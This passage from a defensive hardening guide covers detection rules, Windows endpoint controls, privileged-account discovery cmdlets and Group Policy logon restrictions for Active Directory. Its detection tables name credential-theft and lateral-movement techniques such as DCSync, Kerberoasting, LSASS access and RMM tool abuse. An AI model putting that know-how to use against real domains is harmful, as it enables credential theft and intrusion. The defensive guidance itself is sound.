<p><span>Process Creation Event Involving a COM Object by Different User</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/003/" rel="noopener" target="_blank"><span>T1021.003 – Remote Services: Distributed Component Object Model</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for process creation events including COM objects that are initiated by an account that is not currently the logged-in user for the system.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>High Volume of DCOM-Related Activity</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/003/" rel="noopener" target="_blank"><span>T1021.003 – Remote Services: Distributed Component Object Model</span></a></p>
</td>
<td>
<p><span>Search for a sharp increase in volume of DCOM-related activity. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>Third-Party Remote Access Applications</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1219/" rel="noopener" target="_blank"><span>T1219 – Remote Access Software</span></a></p>
</td>
<td>
<p><span>Search for anomalous use of</span><strong> </strong><span>third-party remote access applications. This type of activity could indicate a threat actor is attempting to use third-party remote access applications as an alternate communication channel or for creating remote interactive sessions.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>BYOVD - EDR/AV Tampering via Vulnerable Drivers</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1068/" rel="noopener" target="_blank"><span>T1068 - Exploitation for Privilege Escalation</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1562/001/" rel="noopener" target="_blank"><span>T1562.001 - Impair Defenses</span></a></p>
</td>
<td>
<p><span>Monitor for kernel driver installations (Sysmon Event ID 6) where the loaded driver hash matches known vulnerable drivers from the LOLDrivers project.</span></p>
<p><span>Alert on new service creation (Event ID 7045) loading .sys files from user-writable paths (e.g., %TEMP%, %APPDATA%). </span></p>
</td>
</tr>
<tr>
<td>
<p><span>RMM Tool Abuse for Lateral Movement</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1219/" rel="noopener" target="_blank"><span>T1219 - Remote Access Tools</span></a></p>
</td>
<td>
<p><span>Monitor for installation or execution of legitimate RMM tools (ScreenConnect/ConnectWise, AnyDesk, Atera, Splashtop, TeamViewer) that are not part of the organization's approved toolset.</span></p>
<p><span>Monitor for new service installations matching known RMM tool signatures.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 18: Detection opportunities for common lateral movement tools and methods</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Additional Endpoint Hardening</span></h4>
<p><span>To help protect against malicious binaries, malware, and encryptors being invoked on endpoints, additional security hardening technologies and controls should be considered. Examples of additional security controls for consideration for Windows-based endpoints are provided as follows.</span></p>
<h5><span>Windows Defender Application Control</span></h5>
<p><span>Windows Defender Application Control is a set of inherent configuration settings within Active Directory that provide lockdown and control mechanisms for controlling which applications and files users can run on endpoints. With this functionality, the following types of rules can be configured within GPOs:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Publisher rules: Can be leveraged to allow or restrict execution of files based upon digital signatures and other attributes</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Path rules: Can be leveraged to allow or restrict file execution or access based upon files residing in specific path</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>File hash rules: Can be leveraged to allow or restrict file execution based on a file's hash</span></p>
</li>
</ul>
<p><span>Additional information related to <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview" rel="noopener" target="_blank">Windows Defender Application Control</a></span><span>.</span></p>
<h5><span>Microsoft Defender Attack Surface Reduction</span></h5>
<p><span>Microsoft Defender Attack Surface Reduction (ASR) rules can help protect against various threats, including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>A threat actor launching executable files and scripts that attempt to download or run files</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>A threat actor running obfuscated or suspicious scripts</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>A threat actor invoking credential theft tools that interface with Local Security Authority Subsystem Service (LSASS)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>A threat actor invoking PsExec or WMI commands</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Normalizing and blocking behaviors that applications do not usually initiate as part of standardized activity</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Blocking executable content from email clients and web mail (phishing)</span></p>
</li>
</ul>
<p><span>ASR requires a Windows E3 license or above. A Windows E5 license provides advanced management capabilities for ASR.</span></p>
<p><span>Additional information related to <a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction" rel="noopener" target="_blank">Microsoft Defender Attack Surface Reduction functionality</a></span><span>.</span></p>
<h5><span>Controlled Folder Access</span></h5>
<p><span>Controlled folder access can help protect data from being encrypted by ransomware. Beginning with Windows 10 version 1709+ and Windows Server 2019+, controlled folder access was introduced within Windows Defender Antivirus (as part of Windows Defender Exploit Guard). </span></p>
<p><span>Once controlled folder access is enabled, applications and executable files are assessed by Windows Defender Antivirus, which then determines if an application is malicious or safe. If an application is determined to be malicious or suspicious, it will be blocked from making changes to any files in a protected folder.</span></p>
<p><span>Once enabled, controlled folder access will apply to a number of system folders and default locations, including:</span></p></div>
<div class="block-paragraph_advanced"><ul>
<li>Documents
<ul>
<li><code>C:\users\&lt;username&gt;\Documents</code></li>
<li><code>C:\users\Public\Documents</code></li>
</ul>
</li>
<li>Pictures
<ul>
<li><code>C:\users\&lt;username&gt;\Pictures</code></li>
<li><code>C:\users\Public\Pictures</code></li>
</ul>
</li>
<li>Videos
<ul>
<li><code>C:\users\&lt;username&gt;\Videos</code></li>
<li><code>C:\users\Public\Videos</code></li>
</ul>
</li>
<li>Music
<ul>
<li><code>C:\users\&lt;username&gt;\Music</code></li>
<li><code>C:\users\Public\Music</code></li>
</ul>
</li>
<li>Desktop
<ul>
<li><code>C:\users\&lt;username&gt;\Desktop</code></li>
<li><code>C:\users\Public\Desktop</code></li>
</ul>
</li>
<li>Favorites
<ul>
<li><code>C:\users\&lt;username&gt;\Favorites</code></li>
</ul>
</li>
</ul></div>
<div class="block-paragraph_advanced"><p><span>Additional folders can be added using the Windows Security application, Group Policy, PowerShell, or mobile device management (MDM) configuration service providers (CSPs). Additionally, applications can be allow-listed for access to protected folders.</span></p>
<p><strong>Note:</strong><span> </span><span>For controlled folder access to fully function, Windows Defender's </span><span>Real Time Protection</span><span> setting must be enabled.</span></p>
<p><span>Additional information related to <a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-controlled-folders" rel="noopener" target="_blank">controlled folder access</a></span><span>.</span></p>
<h5><span>Tamper Protection</span></h5>
<p><span>Threat actors will often attempt to disable security features on endpoints. Tamper protection either in Windows (via Microsoft Defender for Endpoint) or integrated within third-party AV/EDR platforms can help protect security tools from being modified or stopped by a threat actor. Organizations should review the configuration of security technologies that are deployed to endpoints and verify if tamper protection is (or can be) enabled to protect against unauthorized modification. Once implemented, organizations should test and validate that the tamper protection controls behave as expected as different products offer different levels of protection.</span></p>
<p><span>Additional information related to <a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection" rel="noopener" target="_blank">tamper protection for Windows Defender for Endpoint</a></span><span>.</span></p>
<h4><span>Detection Opportunities for Tamper Protection Events</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Threat Actor Attempting to Disable Security Tooling on an Endpoint</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1562/001/" rel="noopener" target="_blank"><span>T1562.001 - Disable or Modify Tools</span></a></p>
</td>
<td>
<p><span>Monitor for evidence of processes or command-line arguments correlating to security tools/services being stopped.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 19: Detection opportunities for tamper protection events</span></div></div>
<div class="block-paragraph_advanced"><h3><span>4. Credential Exposure and Account Protections</span></h3>
<h4><span>Identification of Privileged Accounts and Groups</span></h4>
<p><span>Threat actors will prioritize identifying privileged accounts as part of reconnaissance efforts. Once identified, threat actors will attempt to obtain credentials for these accounts for lateral movement, persistence, and mission fulfillment.</span></p>
<p><span>Organizations should proactively focus on identifying and reviewing the scope of accounts and groups within Active Directory that have an elevated level of privilege. An elevated level of privilege can be determined by the following criteria:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Accounts or nested groups that are assigned membership into default domain and Exchange-based privileged groups (Figure 29)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Accounts or nested groups that are assigned membership into security groups protected by </span><code>AdminSDHolder</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Accounts or groups assigned permissions for organizational units (OUs) housing privileged accounts, groups, or endpoints</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Accounts or groups assigned specific extended right permissions either directly at the root of the domain or for OUs where permissions are inherited by child objects. Examples include:</span></p>
<ul>
<li><code>DS-Replication-Get-Changes-All</code></li>
<li><code>Administer Exchange Information Store</code></li>
<li><code>View Exchange Information Store Status</code></li>
<li><code>Create-Inbound-Forest-Trust</code></li>
<li><code>Migrate-SID-History</code></li>
<li><code>Reanimate-Tombstones</code></li>
<li><code>View Exchange Information Store Status</code></li>
<li><code>User-Force-Change-Password</code></li>
</ul>
</li>
<li aria-level="1">
<p role="presentation"><span>Accounts or groups assigned permissions for modifying or linking GPOs</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Accounts or groups assigned explicit permissions on domain controllers or Tier 0 endpoints</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Accounts or groups assigned directory service replication permissions</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Accounts or groups with local administrative access on all endpoints (or a large scope of critical assets) in a domain</span></p>
</li>
</ul>
<p><span>To identify accounts that are provided membership into default domain-based privileged groups or are protected by </span><code>AdminSDHolder</code><span>, the following PowerShell cmdlets can be run from a domain controller.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>get-ADGroupMember -Identity "Domain Admins" -Recursive | export-csv -path &lt;output directory&gt;\DomainAdmins.csv -NoTypeInformation 

get-ADGroupMember -Identity "Enterprise Admins" -Recursive | export-csv -path &lt;output directory&gt;\EnterpriseAdmins.csv -NoTypeInformation 

get-ADGroupMember -Identity "Schema Admins" -Recursive | export-csv -path &lt;output directory&gt;\SchemaAdmins.csv -NoTypeInformation

get-ADGroupMember -Identity "Administrators" -Recursive | export-csv -path &lt;output directory&gt;\Administrators.csv -NoTypeInformation 

get-ADGroupMember -Identity "Account Operators" -Recursive | export-csv -path &lt;output directory&gt;\AccountOperators.csv -NoTypeInformation 

get-ADGroupMember -Identity "Backup Operators" -Recursive | export-csv -path &lt;output directory&gt;\BackupOperators.csv -NoTypeInformation 

get-ADGroupMember -Identity "Cert Publishers" -Recursive | export-csv -path &lt;output directory&gt;\CertPublishers.csv -NoTypeInformation 

get-ADGroupMember -Identity "Print Operators" -Recursive | export-csv -path &lt;output directory&gt;\PrintOperators.csv -NoTypeInformation 

get-ADGroupMember -Identity "Server Operators" -Recursive | export-csv -path &lt;output directory&gt;\ServerOperators.csv -NoTypeInformation 

get-ADGroupMember -Identity "DNSAdmins" -Recursive | export-csv -path &lt;output directory&gt;\DNSAdmins.csv -NoTypeInformation 

get-ADGroupMember -Identity "Group Policy Creator Owners" -Recursive | export-csv -path &lt;output directory&gt;\Group-Policy-Creator-Owners.csv -NoTypeInformation 

get-ADGroupMember -Identity "Exchange Trusted Subsystem" -Recursive | export-csv -path &lt;output directory&gt;\Exchange-Trusted-Subsystem.csv -NoTypeInformation

get-ADGroupMember -Identity "Exchange Windows Permissions" -Recursive | export-csv -path &lt;output directory&gt;\Exchange-Windows-Permissions.csv -NoTypeInformation 

get-ADGroupMember -Identity "Exchange Recipient Administrators" -Recursive | export-csv -path &lt;output directory&gt;\Exchange-Recipient-Admins.csv -NoTypeInformation 

get-ADUser -Filter {(AdminCount -eq 1) -And (Enabled -eq $True)} | Select-Object Name, DistinguishedName | export-csv -path &lt;output directory&gt;\AdminSDHolder_Enabled.csv</code></pre>
<p><span>Figure 29: Commands to identify domain and exchange-based privileged accounts</span></p></div>
<div class="block-paragraph_advanced"><p><span>Any privileged accounts granted membership into additional security groups can provide a threat actor with a potential path to domain administration-level permissions based upon endpoints where the accounts have permissions to log on or remotely access systems.</span></p>
<p><span>Ideally, only a small scope of accounts should be provided with highly privileged access within a domain. Accounts with highly privileged permissions should </span><strong>not</strong><span> be leveraged for daily use; used for interactive or remote logons to workstations, laptops, or common servers; or used for performing functions on non-domain controller (Tier 0) assets.For additional recommendations for restricting access for privileged accounts, reference the Privileged Account Logon Restrictions</span><span> section of this blog post.</span></p>
<h4><span>Detection Opportunities for Privileged Accounts, Groups, and GPO Modifications</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Interactive or Remote Logon of a Highly Privileged Account to an Unauthorized System</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for logon attempts correlating to highly privileged accounts authenticating to systems that reside outside of the Tier 0 layer.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Privileged Account and Group Discovery</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1069/" rel="noopener" target="_blank"><span>T1069 – Permission Groups Discovery</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for command-line events where a user is attempting to enumerate privileged accounts and groups.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Account Added to Highly Privileged Group</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1098/" rel="noopener" target="_blank"><span>T1098 – Account Manipulation</span></a></p>
</td>
<td>
<p><span>Identify when accounts are added to highly privileged groups. While this can occur as part of normal activity, it should be infrequent and limited to specific accounts.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Modification of Group Policy Objects</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1484/001/" rel="noopener" target="_blank"><span>T1484.001 – Domain Policy Modification: Group Policy Modification</span></a></p>
</td>
<td>
<p><span>Identify when GPOs are created or modified.</span></p>
<p><span>GPOs can also be exported and reviewed to identify last modification timestamps.<br><br></span></p>
<pre class="language-plain"><code>get-gpo -all | export-csv -path "c:\temp\gpo-listing-all.csv" -NoTypeInformation</code></pre>
<p><span>Figure 30: PowerShell cmdlet to export and review GPO creation and modification timestamps</span></p>
</td>
</tr>
<tr>
<td>
<p><span>DCSync Attack</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1003/006/" rel="noopener" target="_blank"><span>T1003.006 - OS Credential Dumping</span></a></p>
</td>
<td>
<p><span>Monitor for non-domain-controller sources issuing directory replication requests (</span><span>DS-Replication-Get-Changes</span><span> and </span><span>DS-Replication-Get-Changes-All</span><span>). </span></p>
<p><span>Event ID 4662 with properties matching the replication GUIDs (</span><span>1131f6aa-*, 1131f6ad-*</span><span>) from non-domain-controller source addresses is a high-fidelity indicator of DCSync.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 20: Detection opportunities for privileged accounts, groups, and GPO modifications</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Privileged and Service Account Protections</span></h4>
<h5><span>Identify and Review Noncomputer Accounts Configured with an SPN</span></h5>
<p><span>Accounts with service principal names (SPNs) are commonly targeted by threat actors for privilege escalation. Using Kerberos, any domain user can request a Kerberos service ticket (TGS) from a domain controller for any account configured with an SPN. Noncomputer accounts likely are configured with guessable (nonrandom) passwords. Regardless of the domain function level or the host's Windows version, SPNs that are registered under a noncomputer account will use the legacy RC4-HMAC encryption suite rather than Advanced Encryption Standard (AES). The key used for encryption and decryption of the RC4-HMAC encryption type represents an unsalted NTLM hash version of the account's password, which could be derived via cracking the ticket.</span></p>
<p><span>Organizations should review Active Directory to identify noncomputer accounts configured with an SPN. Noncomputer accounts correlated to registered SPNs are likely service accounts and provide a method for a threat actor (without administrative privileges) to potentially derive (crack) the plain-text password for the account (Kerberoasting). To identify noncomputer accounts configured with an SPN, the PowerShell cmdlet referenced in Figure 31 can be run from a domain controller.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Get-ADUser -Filter {(ServicePrincipalName -like "*")} | Select-Object name,samaccountname,sid,enabled,DistinguishedName</code></pre>
<p><span>Figure 31: PowerShell cmdlet to identify noncomputer accounts configured with an SPN</span></p></div>
<div class="block-paragraph_advanced"><p><span>Where possible, organizations should deregister noncomputer accounts with SPNs configured. Where SPNs are needed, organizations should mitigate the risk associated with Kerberoasting attacks. Accounts with SPNs should be configured with strong, unique passwords (e.g., minimum 25+ characters) with the passwords rotated on a periodic basis for the accounts. Furthermore, privileges should be reviewed and reduced for these accounts to ensure that each account has the minimum required privileges needed for the intended function.</span></p>
<p><span>Accounts with SPNs should be considered in-scope for the proactive hardening measures detailed throughout this blog post.</span></p>
<p><strong>Note:</strong><span> </span><span>SPNs should never be associated with regular interactive user accounts.</span></p>
<h4><span>Detection Opportunities for Noncomputer Accounts Configured with an SPN</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Potential Kerberoasting Attempt Using RC4</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1558/003/" rel="noopener" target="_blank"><span>T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting</span></a></p>
</td>
<td>
<p><span>Searching for a Kerberos request using downgraded RC4 encryption.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>AS-REP Roasting</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1558/004/" rel="noopener" target="_blank"><span>T1558.004 - Steal or Forge Kerberos Tickets</span></a></p>
</td>
<td>
<p><span>Monitor Event ID 4768 for Kerberos authentication requests using RC4 encryption (0x17) for accounts with the "</span><span>Do not require Kerberos preauthentication</span><span>" flag set. Unlike Kerberoasting (which targets SPNs), AS-REP Roasting targets accounts with disabled preauthentication (which should be reviewed and mitigated).</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 21: Detection opportunities for noncomputer accounts configured with an SPN</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Privileged Account Logon Restrictions</span></h4>
<p><span>Privileged and service account credentials are commonly used for lateral movement and establishing persistence.</span></p>
<p><span>For any accounts that have privileged access throughout an environment, the accounts should not be used on standard workstations and laptops, but rather from designated systems (e.g., privileged access workstations [PAWs]) that reside in restricted and protected VLANs and tiers. Dedicated privileged accounts should be defined for each tier, with controls that enforce that the accounts can only be used within the designated tier. Guardrail enforcement for privileged accounts can be defined within GPOs or by using authentication policy silos (Windows Server 2012 R2 domain-functional level or above).</span></p>
<p><span>The recommendations for restricting the scope of access for privileged accounts are based upon Microsoft's guidance for securing privileged access. For additional information, reference:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><a href="https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model" rel="noopener" target="_blank"><span>https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><a href="https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/authentication-policies-and-authentication-policy-silos" rel="noopener" target="_blank"><span>https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/authentication-policies-and-authentication-policy-silos</span></a></p>
</li>
</ul>
<h5><span>User Rights Assignments</span></h5>
<p><span>As a proactive hardening or quick containment measure, consider blocking any accounts with privileged AD access from being able to log in (remotely or locally) to standard workstations, laptops, and common access servers (e.g., virtualized desktop infrastructure).</span></p>
<p><span>The settings referenced as follows are configurable using user rights assignments defined within GPOs via the path of: </span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p>
</li>
</ul>
<p><span>Accounts delegated with domain-based privileged access should be explicitly denied access to standard workstations and laptop systems within the context of the following settings (which can be configured using GPO settings similar to what are depicted in Figure 32):</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Deny access to this computer from the network (also include</span><strong> </strong><code>S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code><span>) (</span><code>SeDenyNetworkLogonRight</code><span>)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny logon as a batch job (</span><code>SeDenyBatchLogonRight</code><span>)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny logon as a service (</span><code>SeDenyServiceLogonRight</code><span>)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny logon locally (</span><code>SeDenyInteractiveLogonRight</code><span>)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny logon through Terminal Services (</span><code>SeDenyRemoteInteractiveLogonRight</code><span>)</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig32.max-1000x1000.png" alt="Example of Privileged Account Access Restrictions for a Standard Workstation Using GPO Settings">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="l6xux">Figure 32: Example of privileged account access restrictions for a standard workstation using GPO settings</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Additionally, using GPOs, permissions can be restricted on endpoints to protect against privilege escalation and potential data theft by reducing the scope of accounts that have the following user rights assignments:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Debug programs (</span><code>SeDebugPrivilege</code><span>) </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Back up files and directories (</span><code>SeBackupPrivilege</code><span>) </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Restore files and directories (</span><code>SeRestorePrivilege</code><span>) </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Take ownership of files or other objects (</span><code>SeTakeOwnershipPrivilege</code><span>)</span></p>
</li>
</ul>
<h4><span>Detection Opportunities for Privileged Account Logons</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Attempted Logon of a Privileged Account from a Nonprivileged Access Workstation</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for logon attempts correlating to highly privileged accounts authenticating to systems that reside outside of the Tier 0 layer.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 22: Detection opportunities for privileged account logons</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Service Account Logon Restrictions</span></h4>
<p><span>Organizations should also consider enhancing the security of domain-based service accounts to restrict the capability for the accounts to be used for interactive, remote desktop, and, where possible, network-based logons. </span></p>
<p><strong><span>Minimum recommended logon hardening for service accounts (on endpoints where the service account is not required for interactive or remote logon purposes):</span></strong></p>
<ul>
<li><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span>
<ul>
<li>Deny logon locally (<code>SeDenyInteractiveLogonRight</code>)</li>
<li>Deny logon through Terminal Services (<code>SeDenyRemoteInteractiveLogonRight</code>)</li>
</ul>
</li>
</ul>
<p><strong><span>Additional recommended logon hardening for service accounts (on endpoints where the service accounts is not required for network-based logon purposes):</span></strong></p>
<ul>
<li><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span>
<ul>
<li><span>Deny access to this computer from the network (<code>SeDenyNetworkLogonRight</code>)</span></li>
</ul>
</li>
</ul>
